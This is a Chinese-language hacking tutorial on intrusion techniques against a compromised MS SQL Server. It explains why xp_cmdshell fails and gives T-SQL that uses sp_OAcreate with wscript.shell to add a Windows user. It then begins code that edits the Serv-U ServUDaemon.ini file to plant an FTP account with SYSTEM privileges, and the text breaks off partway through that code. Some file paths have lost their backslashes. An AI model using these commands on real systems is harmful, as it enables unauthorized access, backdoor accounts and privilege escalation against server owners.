几个用过的经典入侵技巧整理

核心提示： ★很多朋友问过我这个错误信息是什么意思，这里解释一下，几个用过的经典入侵技巧整理(2)，其实很简单，那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧，在列到D盘的时候发现了服务器装有serv-u，聪明的朋友们是不是想到了什

★

很多朋友问过我这个错误信息是什么意思，这里解释一下，其实很简单，那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧，CMD这个进程无法创建！有可能CMD设置权限拒绝SYSTEM访问，有可能是CMD删除或者改名。以上情况都可以造成 CMD进程无法创建的，如图1。

图1

看来直接想加用户登陆服务器是不可能了，可能有的朋友会说：不是还有SP_OAcreate 么？但是我在使用SP_OAcreate执行：

★

DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD

@shell,’run’,null, ’C:WINdowssystem32cmd.exe /c net user fish sadfish /add’

★

的时候虽然提示执行成功，但是却发现用户并没有添加进去，初步估计应该是wscript.shell被删掉了。

另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用，但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u，聪明的朋友们是不是想到了什么？我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息 添加一个具有system权限的ftp用户，说做就做，首先使用

★

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate ’scripting.filesystemobject’, @o out

exec sp_oamethod @o, ’opentextfile’, @f out, ’d:Serv-U6.3ServUDaemon.ini’, 1